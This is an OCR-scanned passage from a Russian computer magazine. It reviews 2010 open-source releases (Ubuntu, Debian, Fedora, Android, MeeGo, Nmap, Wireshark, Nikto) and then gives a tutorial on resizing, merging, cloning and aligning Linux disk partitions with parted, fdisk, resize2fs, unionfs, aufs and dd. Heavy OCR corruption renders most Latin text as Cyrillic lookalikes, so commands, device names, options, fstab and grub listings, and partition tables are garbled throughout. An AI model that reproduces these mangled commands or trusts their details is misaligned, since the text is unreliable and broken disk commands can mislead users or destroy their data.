Вслед за версией 6 уже в октябре 2010 вышла версия 7: 

• Возможность задать сайты, которым не будет разрешено устанавли- 
вать куки; 

• Возможность загружать на внешние хранилища не по одному файлу, 
а каталог цели ком; 
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Беі имени 1 - ОрепОГМсе.огд Ѵ/гІЬег 
файл Правка йид Вставка Формат Таблице Сервис й 




ООо 3.3 с полем для быстрого поиска 




Новое меню печати в ООо 3.3 

• РіІеАРІ — спецификация, позволяющая получать доступ клокальным 
файлам пользователя из браузера. 

На момент написания статьи Сбгоппе8был еще в стадии беты, поэтому 
списокизменений может быть с большой погрешностью: 

• Начальная поддержка аппаратного ускорения вывода 20-графики 
средствами 6РІІ; 

• Поддержка стандарта ѴѴеЬ0І_; 

• Новый конфигураторе вкладочным интерфейсом; 

• Возможность перенести панель с вкладками в левую частьэкрана и 
разместить ее вертикально (ксожалению, пока не работает на І_іпих); 

• Динамический поиск в адресной строке: результаты появляются по 
мере набора запроса. 

Дистрибутивы 

Самый популярный дистрибутив, Іібипіи, продолжал выходить со своей 
обычной периодичностью: раз в полгода. В апреле вышел релиз 1 0.04. 
Это необычный релиз, а ИЗ (І_опд Тегт Зиррогі), десктопная редакция 
которого будет поддерживаться три года, а серверная — пять лет. Кроме 
стандартных обновления ядра и практически всех компонентов можно 
отметить: 

• Серьезное изменениетемы поумолчанию. Кнопки окнатеперь рас- 
полагаются слева окна в порядке: закрыть, скрыть, свернуть. Несколько 
спорное решение для ПЗ-релиза, я считаю; 

• Поумолчанию в качестве драйвера для видеокарт ІМѵісІіа использует- 
ся ІМоиѵеаи; 

• Удаление всех компонентов НАС из системы. 

10.10.10 вышел релиз Іібипіи 10. 10 со следующими изменениями: 

• Серьезно переработан инсталлятор: установка начинается еще до 
того, как пользователь ответил на все вопросы, поддержка установки на 
Ыгіъ, появилисьопцииустановки обновлений и несвободного ПО; 

• В центре приложений добавлена возможность покупки платного ПО. 
Правда, на моментрелизатам была всего одна прога — проигрыва- 
тель Ріиепсіо. Ното ли еще будет! Правда, пока неизвестно, кчемуэта 
инициатива приведет; 

• В Ыеібоокесііііоп теперь используется разработанное Сапопісаі 
рабочее окружение Ііпііу. 

Разработчики погналисьза красивой датой релиза и выпустили его 
ссерьезными багами, за что Сапопісаі не пнул разве что ленивый 



блоггер. Самый досадный баг: ни стого, ни с сего (сточки зрения 
юзера) начинала бесконечно переключаться раскладка клавиатуры, и 
дпоте-веиіпдз-сіаетоп кушал 100% проца. Кчести разработчиков, баг 
пофиксили довольно оперативно. 

Про следующую версию 1 1 .04 (кодовое имя — Ыаііу Ыагѵѵбаі, аккурат- 
ный нарвал) известно уже довольно много благодаря прошедшему 
Іібипіи ОеѵеІорегЗиттіІ:: 

• Стандартный интерфейсСІЧОМЕЗ.О (6І\І0МЕ8беІІ) будетзаменен в 
десктопной версии на собственную оболочку II пііу. Ыеібоокесііііоп и 
Оезкіор есііііоп будут размещены на одном Сй; 

•Аудио-плеером поумолчанию будет бапабее. Только, вродебы, из 
Іібипіи убрали приложение на топо (І-зроі), кактутже добавили новое. 
Непонятно; 

• Скорее всего, использоваться будет ядро 2.6.38, Х.Огд Эегѵег 1 .10 (или 
Х.Огд Эегѵег 1 .09 с некоторыми бэкпортированными фичами из 1.10), 
Меза 7.10, для картРабеопХІ 000 (Р500) и младше поумолчанию будет 
использоваться драйвер Р300 ѲаШитЗО; 

• Много внимания будетуделено поддержке АРМ, мультимониторных 
конфигураций итачскринов. 

Прародитель Іібипіи, Оебіап, в 2010 году не порадовал насновым 
релизом. Его планировалось выпустить, но дебиан не был бы дебианом, 
если бы дату релиза не перенесли. Хотя есть еще шанс, что он выйдет 
в декабре 2010. Но кроме подготовки к новому релизу, в сообществе 
произошло несколько знаковых изменений: 

• Сайт баскрогіз.огд переехал на баскрогіз.сіебіап.огс . Таким образом, 
теперьэто официальный сервис; 

• Рассматривается возможность выпуска гоШпд-ветки (безрелизной) 
Оебіап ; 

• Открылся архивный раздел проекта Ребіап: зпарзбоі.сіебіап.огд. 
в котором хранятся предыдущие версии пакетов. Таким образом, 
пользователь получает возможность установить пакет или просмотреть 
исходный коддля любой нужной ему версии программы. 

Самый известный РРМ-базесІ дистрибутив, Еебога, в прошлом году 
отметился двумя релизами, 13 и 14со следующими нововведениями: 

• Поддержка Вігіз. Ѵит можетавтоматически создавать снимки разде- 
лов сэтой ФС при установке или обновлении пакетов; 

• Добавлен Руібоп 3, который будет работать совместно с Руібоп 2. 
Также добавлен компилятор языка й; 

• Поддержка протокола Эрісе (Эіппріе Ргоіосоііог Іпберепсіепі 
Сотриііпд Епѵігоптепіз) для удаленной работы с рабочим столом ОС, 
запущенной в ОЕМІІ. Главная особенность этого протокола втом, что 
рендерингсодержимого экрана и обработка аудиопотоков производит- 
ся на клиенте. Теперь можно без особого оверхеда смотреть видео или 
общаться по скайпу в виртуалке; 

• Интерфейс для нетбуков на базе наработок проекта МееѲо; 

• ФреймворкОрепЭСАР. 5САР (Эесигііу Сопіепі Аиіоппаііоп Ргоіосоі) 

— это набор стандартов по организации информации, по безопасности 
вычислительных систем. ОрепЗСАР упрощает разработку инструмен- 
тов, работающих со стандартами 5САР, а также содержит ряд утилит, 
основанных на этом фреймворке, например озсар-зсап — консольный 
сканер безопасности, работающий с форматами ОѴАІ_ и ХССОЕ. 
ВЭО-системытоже не отстают — ЕгееВЭО в 2010 году порадовала двумя 
релизами: 7.3 и 8.1 . В 8.1 не очень много изменений: 

• 2Е5ѵ14; 
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• Добавлена поддержка архитектур ШгаЗРАРС ІѴ/ІѴ+, 5РАРС64 V; 

• Поддержка ЗМРдля процессоров РоѵѵегРС 65; 

• Новые драйвера для проводных и беспроводных сетевых карточек 
производства Вгоасісопп, Раііпк и ЗіЗ. 

ВЗО-семейство пополнилосьи другими новыми релизами: ОрепВБО 
4.7 и 4.8 (кстати, 19 октября проекту исполнилось 1 5 лет), ВгадопРІуВЗС) 
2.6 и 2.8, РС-В5Р 8.0 и 8.1 , ЫеШЗй 5.0.2. 

Всеобщая мобилизация 

Большое количество релизов настольных/серверных дистрибутивов — 
это норма, а вот выход такого большого, как в 201 0, количества версий 
ОС на базе І_іпих для мобильников — это скорее нонсенс. 

Самый популярный Ыпихдля мобильныхустройств — Соодіе АпсІгоісІ 
— показал в 201 0 очень внушительный рост. По некоторым данным, 
продажи АпсІгоісІ -устройств обошли Арріе іРЬопе и вышли на первое 
место (по крайней мере, на рынке США), а количество приложений в 
АпсІгоісІ Магкеі перевалило за 1 00 000. 

В мае 2010 вышел АпсІгоісІ 2.2 со следующими основными изменения- 
ми: 

• Браузертеперь быстрее и поддерживает АО обе РІазЬ 10.1; 

• Интеграция с МісгозоЯ: ЕхсЬапде; 

• Компилятор Оаіѵік ЛТ, благодаря которому ощутимо возросла ско- 
рость работы; 

• Функции модема и точки доступа ѴѴі-Рі; 

• Возможность установки приложений на карту памяти. Нотолькотех, в 
которых та кая возможность предусмотрена; 

• Функция автообновления приложений. 

На конец2010запланирован выход АпсІгоісІ 2.3. Списокизменений 
ожидается следующим: 

• Поддержка воспроизведения видеоформата ѴѴеЬМ; 

• Оптимизированный пользовательский интерфейс; 

• Поддержка видеозвонков; 

• Оптимизация под использование в планшетах. 

АпсІгоісІ — хоть и самая популярная, но не единственная ОС на базе 
Ыпихдля телефонов. Правда, остальные решения — либо нишевые 
для 1 -2устройств, либо прототипы. Один из прототипов, подающий 
большие надежды — Меедо — получился после слияния Маето (Ыпих 
отІЧокіа) и МоЫіп (Ыпихотіпіеі). Сейчасдистрибутив находится под 
попечительством Ыпих Роипбабоп. И если АпсІгоісІ вызывает неко- 
торые вопросы касательно своей открытости, то у Меедо с этим все в 
порядке (доступны ѴС5-репозитории, все наработки распространяют- 
ся под лицензией В50). Пока Меедо существует в трех вариантах: для 
нетбуков, телефонов и СагРС. Последняя на моментнаписания статьи 
версия (1.1) включает в себя: 

• Ыпих 2.6.35, 6СС4.5.0; 

• Х.Огд 1.9.0. Наличие полноценных иксов позволяет без особого труда 
портировать на Меедо обычные десктопные приложения; 

• 01:4.7 — основной фреймворкдля разработки приложений, хотя никто 
не мешаетиспользоватьлюбой другой; 

• В качестве файловой системы по умолчанию используется ВігЫ. 
Спорное решение, учитывая экспериментальный статус этой ФС; 

• Пакетный менеджер Хуррег, использующий РРМ-пакеты; 

• За звонки отвечаеттелефонный стекоРопо, а за настройку сети — 
СоппМап; 

• Для индексации данных встроен поисковый движокТгаскег; 

• Атакже ВІиеІооіЬ-стекВІиеХ, 0-ВІІ5, ОЗігеатеги РиІзеАибіо. 
Несмотря на номер версии, дистрибутив можно назвать пока разве что 
альфа-версией. 

У Меедо уже есть свой магазин приложений — АррЫІр, разработанный 
ранее Іпіеідля МоЫіп. Правда, там пока не болышетысячи приложе- 
ний, но и телефонов, на которые можно поставить Меедо, пока раз, 
два и обчелся (ІЧокіа N900 и Ааѵа МоЬіІе). В магазине доступны какот- 
крытые, так и закрытые (платные и бесплатные) приложения; платные 
приложения можно опробовать втечение сутокдо покупки. 

По слухам, первый смартфон с предустановленной Меедо (Ыокіа N9) 
должен выйти в начале 2011. 










Пентестеру на радость 

В минувшем годубыл праздники наулице пентестеров. Вышла 
четвертая версия самого известного дистрибутива для тестирования 
безопасности — ВаскТгаск. Основные нововведения — это переход 
на ядро 2.6.34 и появление полноценного РІихЬох-окружения. ЫМАР 
тоже продолжал радовать бурным развитием: за 2010 год вышли 
версии 5.20, 5.30ВЕТА1 и 5.350С1 с большим количеством суммарных 
улучшений: 

• Усовершенствованное ІЮ Р-сканирование; 

• Почти 1 00 новых ЫЗЕ (Ыітіар Зсгірбпд Епдіпе) скриптов; 

• Добавлено более 600 сигнатур для определения ОС и более 1300 
сигнатур для определения версий сервисов; 

•Добавлена новаяутилита N ріпд , позволяющая генерировать пакеты 
различных сетевых протоколов; 

• Улучшенная производительность и пониженное потребление памяти. 
До версии 1 .4.1 обновился мощный сниффер ѴѴігезЬагк (бывший 
ЕіЬегеаІ): 

• Добавлена поддержка более 80 новых сетевых протоколов; 

• Тестовые биндинги для РуіЬоп (пока только для *піх’ов, на ѴѴіпсІоѵѵз не 
работает); 

• Возможность игнорирования пакетов по маске; 

• Добавлена возможность открытия ОРЕО и РТР-потока прямо в 
ѴѴігезЬагк; 

• Возможность вручную указать размер буфера захвата (при использо- 
вании ІІЬрсар 1 .0.0 и выше); 

• Возможность прямого мониторинга беспроводных сетей (при ис- 
пользовании ІІЬрсар 1 .0.0 и выше). 

Сканер веб-серверов на предмет наличия уязвимостей Ыікіо пора- 
довал тремя релизами: 2.1 .1-2.1 .3. Не смотря на минорные цифры в 
версии, обновления достаточно существенные: 

• Возросла скорость работы, уменьшилось потребление памяти; 

• Более 2300 новых РРІ (гетоіебіе іпсіизіоп) тестов; 

• Возможность просматривать статус сканирования в интерактивном 
режиме и поставить сканирование на паузу; 

• Возможность загрузки плагинов; 

• Обновленный модуль ІЫЬѵѵЬізкег включает в себя две новыетехники 
обхода ЮЗ; 

• Теперь ХМ Ь-отчет включает в себя информацию о 55І_. 

Заключение 

В первой половине 2010 года Сапопісаі с гордостью сообщил, что 
пользователей ІІЬипІи Оезкіор теперь насчитывается около 1 2 
миллионов. И это самый популярный дистрибутив. Тогда получаются 
не очень впечатляющие цифры для Ыпих в целом. Все те же 1 -2% 
десктопов. 

Несмотря на то, что в 2010 популярные дистрибутивы стали еще ближе 
к обычному пользователю, можно констатировать тот фа кт, что год Ыпих 
на десктопе в очередной раз неудался. Зато следующий год, весьма 
вероятно, станет годом Ыпих на мобильныхустройствах (смартфоны и 
планшеты). □с 
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ІЛЧІХОЮ 



1 такз.ЬаІсЬеігауапсІех.ги 



Тонкий 

расчет 

Копируем, изменяем, объединяем 
и правильно форматируем диски и 



• После многочисленныхэкспериментов с виндой, Ыпих- 
дистрибутивами и ВЗО-системами остается похожая на кашу таблица 
разделов, которую придется исправлять, чтобы окончательно 
не запутаться в именах разделов и точках монтирования. 



В этой статье мы рассмотрим способы реше- 
ния некоторых дисковых проблем, с которыми 
рано или поздно сталкивается каждый линук- 
соид. Прочитав ее, ты узнаешь, какизменять 
размер разделов, пользуясь толь ко стан- 
дартными Ыпих-утилитами, какобъединить 
несколько разделов в один без переноса или 
потери информации, какскопироватьопера- 
ционку на другой жесткий диск и подготовить 
Ыпих к работе с дисками, размер секторов 
которых равен 4 Кб. 

Изменение 
размера разделов 

Представим себетакую ситуацию: на диске 
имеется два расширенных раздела, каждый 
из которых разбит на три подраздела: зѵѵар, 
раздел, содержащий Ыпих, и раздел /боте. 
Это два Ыпих-дистрибутива, установленные 
рядом другсдругом. Сразуза ними идет раз- 
дел для данных. Однажды ты понимаешь, что 
второй Ыпих-дистрибутивтебе не нужен, и ре- 
шаешьудалить второй расширенный раздел. 
На его месте остается свободное пространс- 



тво, и теперьутебя есть две возможности 
его утилизировать: создать дополнительный 
раздел для данных, что будет совсем не краси- 
во, потому какодин такой раздел уже есть, или 
же изменить размер/боте-раздела первого 
дистрибутива так, чтобы он занял освободив- 
шееся пространство и таким образом сохра- 
нить простоту и очевидность разметки диска. 
Отом, какэто сделать, мы поговорим ниже. 
Есть как минимум три способа изменить раз- 
мер раздела: воспользоваться графической 
утилитой драгіеб, консольной утилитой рагіеб, 
либо сделать все руками. Первый способ 
слишком прост, чтобы рассматривать его под- 
робно, а вот вторые два заслуживаютособого 
внимания. Для начала рассмотрим варианте 
рагіеб. Перво-напервоустановим утилиту: 

$ зисіо арЦ-деС іпзДаІІ рагСесі 

Далее переходим в однопользовательский 
режим и размонтируем раздел /боте: 

$ зисіо СеІіпіЦ 1 



# итоипЦ /Ъоте 

Если вместо /ботеты собираешься изменять 
размер корневого раздела Ыпих или какого- 
либо другого системного раздела, то тебе при- 
дется загрузиться с ЫѵеСО с предустановлен- 
ным рагіеб. ЗузІетРезсиеСО [ ѵѵѵѵѵѵ.зѵзгезссб. 
от . периодически мы выкладываем его на 
ОѴй) хорошо подойдет на эту роль. Далее 
запускаем рагіеб отимени администратора: 

$ зисіо рагДесі /сіеѵ/зсіа 

Набираем команду ргіпі, которая должна 
вывести список имеющихся разделов. 
Находим среди них нужный и запоминаем 
его номер (первый столбец), а также адрес 
начала раздела, расположенного сразу 
после освобожденного раздела (в нашем 
случае это раздел с данными, адрес запи- 
сан в гигабайтах, например, 62,90В). Далее 
вводим команду «гезіге номер_раздела». 
На вопрос «Зіагі» отвечаем нажатием 
<ЕпІег>, на вопрос «Епб» вводим адрес, 
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> аигіо 14 іак -1 и 

Омск /Й&ѵ / з гіэ : 250 Л Гб, 2*00*93*0016 байт 

255 ЫаеЩ 69 »«сі»г»/і гаек, 35401 суТ.ьлНега, все-ге 466397156 секторов 

1)пі*і * секторы об 1 + $12 * 512 Ьуіві 

$ес*ег ііів ( Іодісзі/рііузісаі ) : 512 Ь/Іеі / $12 Ьуі*з 

1/0 зі» (яіпіаиін/оріііиіі : $12 Ьуіез / 512 Ьу*ез 

0І5Іс і{|ми(ІАт: ЭхеЗббеЗбб 



УсѴр-ЬО Загр 


Начало 


КйнеЦ 


блоки 


Ісі Система 


/с!еѵ/*а* 1 * 


62 


122631164 


61440561 


7 


НРР5/МТР5 


/ЙЕѵ/ягіа2 


122532946 


466396795 


152757977 


$ 


Расширенный 


/гіеѵ/яйа* 

іа 

/йеѵ/зіівб 


122ВЕ2Ѳ48 


126767583 


195276В 


82 


Ьіпіи сноп / 5*\аг 


126739652 


1424 Ц775 


7611072 


59 


Ііпюх 


/4*ѵ/-і4шУ 

>■ 


І42413Э24 


4В03967Н 


17299 14В6 


33 


Ипшс 



2010 год, а первый раздел до сих пор в 63 
секторе 



9 /е1с/б5баЬ: зіаііс бііе 5у5Іет іпбогтаііоп. 

1)5е ‘Ыкісі -о ѵаіие -5 ШЛО' іо ргіпі ІМе игйѵегБаНу ипЩие ійепіібіег 

# бог а йеѵісе; ІИІ5 тау Ье и$егі «Ші 1)1110= а$ а тоге гоЬизі «ау Іо пате 

# (Іеѵісез ІЬаі «огк5 еѵеп 16 <1і5к5 аге асісіесі апй гетоѵеО. 5ее 6&іаЬ{5). 



# <611е 5 у 5 Іет> <тоип! роіпі> <1уре> <ор11ол$> «1итр> 

/ргос ргос посІеѵ.поехес.поіиіО О 

Ш / «аз оп /сіеѵ/зйаб Оигіпд іпвіаІЛаІіоп 

1 =с27 13665 - Ос 67 - 4а5 с) - 850е • Ь7Ь94 10с ОЬ Т 5 / «Х<4 

# /Ьоте «аз оп /йеѵ/з(1а7 сіигіпд Іпзіаііаііоп 

а<1Ь041ес-4602-4саЗ -94ее - 6а1354Т18ТЗЬ /Гтсте *хГ4 

й з«ар «аз оп /беѵ/зс1а5 Оигіпд ІпзІаІЛаіІоп 

= еО 6 13450 -2093 - 488 с -а2ае -(13 <11с177995Ьа попе з«ар 



<разз> 

О 



еггогз=гетоип6-го I 



При переносе ФС все эти ШГО необходимо заменить именами 
разделов 



чуть меньший адреса раздела сданными (например, 
62,86В). После окончания процедуры набираем «циіі» 
и перезагружаем машину. Все то же самое можно 
проделать вручную. Это может быть полезным, когда 
требуется изменить размер системного раздела, а под 
рукой есть только обычный ЫѵеСО без утилиты рагіеб 
на борту. В этом случае сойдут стандартные утилиты 
бсі ізк и гезІ2е21 : 5 из пакета е2Ыргод5 (для файловых 
систем Ехі2, ЕхіЗ и Ехі4). Загружаемся с ЫѵеСО, смот- 
рим таблицу разделов: 

# ксіізк -1 

Запоминаем номер первого цилиндра раздела/ 
боте. Чтобы изменение размера ФС прошло ус- 
пешно, она не должна содержать ошибок, поэтому 
запускаем Ыск на разделе /боте (здесь и далее его 
имя будет/беѵ/зба7) 

# кзск -п /с1еѵ/зс1а7 

Теперь нам надо удалить раздел /беѵ/зба7 и создать на его 
месте раздел большего размера, который будетзаниматьтак- 
же и освобожденную ранее область. Для этого запускаем Ыізк: 

# ксіізк /сіеѵ/зсіа 

В ответна приглашение квводу пишем команду 'б' (удале- 
ние раздела) и вводим номер раздела (/беѵ/зба7 = номер 
7). Далее создаем новый логический раздел с помощью 
команды ’п', вслед за которой пишем Т (логический раз- 
дел). В ответна приглашение квводу первого цилиндра 
указываем номер, полученный ранее с помощью команды 
«Ыізк -I». В ответ на приглашение к вводу последнего ци- 
линдра жмем <Еп1ег> (поумолчаниюЫізкделаетновый 
раздел максимально возможного размера, такчто он зай- 
мет и освобожденную ранее область). Вводим команду ’р', 
чтобы проверить правильность новой таблицы разделов, 
и записываем изменения с помощью команды V. Пере- 
загружаем комп и вновь грузимся с ЫѵеСО. Производим 
проверку файловой системы: 

# кзск -к /с!еѵ/зс1а7 

Запускаем утилиту гезЫе21 : 5 без аргументов, чтобы она ав- 
томатически сделала размер файловой системы равным 
размеру нового раздела: 

# гезіге2кз /с!еѵ/зс1а7 

Запускаем контрольную проверку ФС и перезагружаемся: 



Объединение разделов 

Прием с изменением размера раздела хорошо подходит 
для объединения двух соседних разделов в один. Если 
файловые системы разделов заняты менее чем наполо- 
вину, мы можем просто перенести информацию из одного 
раздела в другой, удалить освобожденный раздел и 
расширить оставшийся так, чтобы он занял пространство 
освобожденного. Однако такой прием не пройдет, если 
оба раздела заполнены под завязку, а возможности пе- 
ренести данные на другой диск или носитель нет. В этом 
случае тебя спасут специальные оверлейные файловые 
системы, позволяющие виртуально объединять файловые 
системы и монтировать их обе к одному каталогу. 

Всего для Ып их существует как минимум три подобные 
ФС: и піопбз, аиЫ2 и тЬббЫ. Первые две включены в ядро 
и, по сути, являются разными реализациями одного и того 
же механизма, причем аиЫ2 в силу своей продвинутос- 
ти и стабильности считается более предпочтительным 
вариантом. ФС тЬббЫ (МиШ-ЕЮО ЕіІеЗѵзІет. тЬббЫ. 
иѵѵѵ.ги ) — Ызе-реализация той же идеи, обладающая при- 
ятной вкусностью в виде автоматического перемещения 
растущего файла во второй раздел в случае, если место на 
первом заканчивается. 

Какую из них использовать — решатьтебе, я же просто 
покажу, как пользоваться каждой из них. Предположим, 
утебя естьтри раздела и большая коллекция музыки, 
которую необходимо распределить между ними (не влазит 
она в один или два раздела). Разделы примонтированы к 
каталогам /тпі/бізкі ,/тпі/бІ5к2 и /тпі/бізкЗ, в каждом 
из нихзаблаговременно создан каталог Мизіс. Задача: 
объединить все три каталога и смонтировать их к каталогу 
/Ьоте/ѵазуа/Мизіс. С помощью ипіопЫ эта задача реша- 
ется так: 

$ зисіо тоипк -к ипіопкз -о с!ігз=/тпк/сіізк1/ 
Мизіс=гѵ7: /тпк/с1ізк2 /Мизіс=гѵ7: /тпк/сіізкЗ/ 
Мизіс ипіопкз /кюте/ѵазуа/Мизіс 

С помощью аиЫ2 — так: 

$ зисіо тоипк -к аикз попе /кюте/ѵазуа/Мизіс -о 
Ъг : /тпк/сіізкі /Мизіс=гѵ7: /тпк/с!ізк2 /Мизіс=гѵ7: / 
тпк/сіізкЗ /Мизіс=гѵ7, сгеаке=ткз , зит 

Ас помощью тЬббЫ — вот та к: 

$ зисіо арк-дек іпзкаіі тксісікз 
$ зисіо ткіскікз /тпк/сіізкІ/Мизіс , /тпк/сіізк2/ 
Мизіс , /тпк/сіізкЗ /Мизіс /кюте/ѵазуа/Мизіс -о 
т1ітік=10С 




> іпіо 

• Во время переноса 
ФС на другой 

диск вместо имен 
разделов в ЫаЬ 
можно указать и 
принятые в ІІЬипЩ 
ІЛІЮ, которые можно 
узнать с помощью 
команды Ыкісі : 

$ зисіо Ыкіб /беѵ/збаі 

• Прогресс 
копирования бб 
можно узнать, 
набрав в соседнем 
терминале команду: 

$ зисіо максЬ. 

-п60 кіііаіі 
-ЗІОИЗКІ сісі 



# кзск -п /сіеѵ/зсіа7 

# геЬоок 



В первом случае новые данные будут записываться 
в первую очередь в раздел, каталог которого указан 
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первым, и только после заполнения раздела начнут писаться в сле- 
дующий. Во втором (благодаря опции гтгіз] для записи будет всегда 
выбираться каталог, расположенный в разделе с наибольшим 
свободным пространством. Втретьем случае сначала будет выбран 
каталог, расположенный на разделе с более чем 1 0 Гб свободного 
пространства, и если таковой найден не будет, запись пойдет на 
раздел с наибольшим свободным пространством. Чтобы не набирать 
все это руками после каждой загрузки, можно добавитьзапись в 
/еІсЛзІаЬ: 



попе /кюте/ѵазуа/Мизіс аикз Ьг : /тпк/<іізк1/Мизіс=гѵ7: / 
тпк/сІізк2 /Мизіс=гѵ7: /тпк/сІізкЗ /Мизіс , сгеаке=ткз , зит О О 




Изменение размера ЫТР5-раздела 



1. Устанавливаем пйзргодз: 

$ зисіо арк-дек іпзкаіі пккзргодз 

2 . Размонтируем [\ІТР5-раздел: 

$ зисіо ишоипк /сіеѵ/зсіаі 

3. Изменяем размер: 

$ зисіо пккзгезіге -з 10000М /сіеѵ/зсіаі 

4 . С помощью бсіізк удаляем І\ІТР5-раздел и создаем новый размером 



10000 Мб; 



5 . Перезагружаемся в ѴѴіпбоѵѵз и даем ей возможность выполнить 
проверкуФС. 



#ѵі/еІсЛзІаЬ 

/сіеѵ/зсіаі / ехк4 еггогз=гешоипк-го 0 1 
/сіеѵ/зсіа2 /кюше ехк4 сіекаиікз 0 2 
/сіеѵ/зсіаЗ попе зтлгар зм О О 



Клонирование и перенос данных 

С изменениями и объединениями разделов разобрались, но что 
делать, еслиты купил новый хард и хочешь перенести имеющиеся ОС 
и данные на него? На самом деле все просто, І_іпих — гибкая ОС, кото- 
рую достаточно легко перенести на другой диск. И способов сделать 
это есть как минимум два: вручную перенести файлы ОС на другой 
диск, либо скопировать весьжесткий диск/раздел (что удобно при 
клонировании одной инсталляции на множество машин). Рассмотрим 
первый способ, взявза основу дистрибутив ІІЬипІи 10.10. Чтобы ско- 
пироватьего на другой диск, не нужно ничего, кроме диска и набора 
стандартных утилит командной строки. Вот пошаговое описание всей 
операции: 

1. Подцепляем второй жесткий диск к компу и загружаемся с ЫѵеСО. 

2 . Определяемся с разделами, которые следует перенести. Обычно 
ІІЬипІи установлен либо в один раздел (плюсзѵѵар), либо в два: корень 
и раздел /боте. Создаем на новом диске те же разделы (с помощью 
сбсіізк или драгіеб это сделать легко) и зѵѵар. Не забываем сделать 
корневой раздел загрузочным. 

3. Создаемточки монтирования и подключаем кним разделы старого и 
нового дисков (/сі еѵ/зсіа — старый диск, /сІеѵ/зсІЬ — новый): 

# гпксііг /гппк/ (гоокі ,гоок2 ,Ь.оше1 ,кюше2 } 

# тошік /сіеѵ/зсіаі /шпк/гоокі 

# тошік /сіеѵ/зсіЫ /тпк/гоок2 

# тоипк /сіеѵ/зсіа2 /тпк/кютеі 

# тоипк /сіеѵ/зсіЬ2 /тпк/кюте2 

В командах монтирования подставляем нужные номера разделов. 

4 . Копируем файлы на новый диск: 

# ср -ах /тпк/гоокі/* /тпк/гоок2 

# ср -ах /тпк/кютеі/* /тпк/кюте2 

5 . Далее выполняем сбгооі в каталог/тп1;/гоо1;2, исправляем /тпі/ 
гоо^/еІсЛзІаЬ и устанавливаем дгиЬ. Но чтобы сделать это, следует 
смонтировать каталоги /сіеѵ и /ргос к/тп1;/гоо1;2: 

# тоипк --Ыпсі /сіеѵ /тпк/гоок2/сіеѵ 

# тоипк --Ыпсі /ргос /тпк/гоок2 /ргос 

6 . Переходим в песочницу (сбгоо1;/тп1;/гоо1;2) и редактируем /еІсЛзІаЬ: 



Указываем нужные имена разделов вместо /сіеѵ/зсіа 1 , /сІеѵ/5СІа2 и /сіеѵ/ 
зсІаЗ. Незабываем, что если мы собираемся поставить новый диск на 
место старого, то его имя будет /б еѵ/зсіа (а не/беѵ/збЬ, каксейчас). 

7 . Устанавливаем дгиЬ (все описанное актуально только для дгиЬ2): 

# дгиЬ-тксіеѵісетар 

# дгиЬ-тксопкід > /Ьоок/дгиЬ/дгиЬ . скд 

# зисіо дгиЬ-іпзкаІІ /сіеѵ/зсіЬ 

8. Командой ехк выходим из сбгоор выключаем машину, вынимаем 
старый диск, ставим на его место новый, включаем машину. 
Такназываемое клонирование диска, когда вместо отдельных файлов 
на новый диск переносится образ всего диска или раздела, сделать 
гораздо проще. Для этого можно использовать штатную утилиту 66: 

# скі і к =/ сіеѵ/зсіа ок=/с!еѵ/зс1Ъ Ьз = 4к 

Однако проблема этого подхода в том, что если размер нового диска 
будет больше старого, все дополнительные гигабайты пространства 
окажутся потерянными, итогда придется либоувеличивать размер 
последнего раздела диска, либо создавать на свободном пространс- 
тве новый раздел. Тем не менее, сИ оченьудобна при клонировании 
установокОС на множество машин. 

Проблема 2010 

В начале года на рынках нашей страны появились первыежесткие 
диски компании ѴѴезІегп Оідііаі, размер сектора которых был увеличен 
с привычных 51 2 байт до 4 Кб (так называемая технология Абѵапсеб 
Вогта!). Позаявлению компании, новые диски обладают более вы- 
сокой скоростью работы, большей емкостью при меньших затратах на 
производство и полностью совместимы со старыми компами. Однако 
оказалось, что, будучи отформатированными в Ыпих, В50 или ѴѴіпХР/ 
ѴѴіп2кЗ, новые диски оказывались нетолько совсем не шустрыми, но и 
поразительно медленными (при записи наблюдалась З-х/4-х кратная 
потеря скорости). 

Сама Ѵ\Ю предлагаетдва решения этой проблемы: либо воспользо- 
ваться ѴѴіпбоѵѵз-утилитой У\Ю Аіідп, которая сдвинет начало первого 
раздела на один 512 байтный сектор (чтобы адрес начала ФС совпадал 
с адресом начала девятого сектора) и заодно вы полнит выравнивание 
всех остальных имеющихся разделов; либо установить перемычку на 
седьмой и восьмой конты диска, что приведет к виртуальному сдвигу 
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ОгиЬ2 автоматически найдет ОС на диске и сгенерирует конфиг 



> эндо дгиЬ-тксогтГід 
Бепега±іпд дгиЬ.сТд ... 
и 

# 00 МОТ ЕОІТ ТНІ5 РШЕ 

№ II із аиіотаІісаІЛу депегаіесі Ьу дгиЬ-тксопТід изіпд 1; ешр\ аТ ез 

# Ігот /еіс/дги&.д апй зеШпдз Тгот /еіс/деТаиІІ/дгиЬ 
№ 

т ВЕОІИ /еіс/дгиЬ . <3/00_ИеасІег ### 

ІІ [ -з $ргеГ1х/дгиЬепѵ ]; ГПеп 
зеі Паѵе_дгиЬепѵ=1:гие 
1оад_епѵ 
Іі 

зеі: йеІаии="0° 

іі [ ‘${ргеѵ_заѵед_епггу>" ]; ІПеп 
з еі: за ѵей_епі г у= '' $ { р ге ѵ_за ѵей_епі г у > " 
заѵе_епѵ заѵеР_епггу 
зеі: р ге ѵ_за ѵеО_еп1; г у= 
заѵе_епѵ ргеѵ_заѵеР_епггу 
зеі: Ьооѣ_опсе=ггие 
Іі 



Клонирование диска на другую 
машину подручными средствами 



На машине-источнике выполняем: 



# сісі іР=/сіеѵ/зсіа Ьз=4к | пексак < ІР-приемника >1234 



На машине-приемнике: 



# пексак -1 -р 1234 | сісі ок=/с!еѵ/зс1Ъ Ьз=4к 



> зисіо дгиЬ-тксопТід > дгиЬ.с^д 
Сепегаііпд дгиЬ.сІд ... 

РоипсІ Ііпих ітаде: /Ьоо1:/ѵт1іпи2-2.6.35-22-депегіс 
РоипсІ іпіігсі ітаде: /Ьооі/іпіігсі . ітд-2.6.35-22-депегіс 
Роипсі Ііпих ітаде: /Ьооі/ѵт1іпиг-2.б.32-24-депегіс 
РоипсІ іпіігсі ітаде: /Ьооі/іпіігсІ . ітд-2.б.32-24-депегіс 
Роипсі тетіезі86+ ітаде: /Ьооі/тетіезі86+. Ьіп 
Роипсі Місгозо-Гі Ыіпсіоѵуз ХР Ргоіеззіопаі КІІ оп /сіеѵ/зсіаі 
сіопе 

> і 




Уменьшаем размер образа 



Ты можешь существенно уменьшить размер архива с образом раздела, 
сделанным сісі, если предварительно забьешь его нулями (вторая коман- 
да должна привести кисчерпанию пространства на ФС, это нормально): 

# тоипк /сіеѵ/зсіаі /тпк 

# сісі і1=/с1еѵ/2его ок=/тпк/ 2 его Ьз=4к 

# гш -1 /тпк/гего 



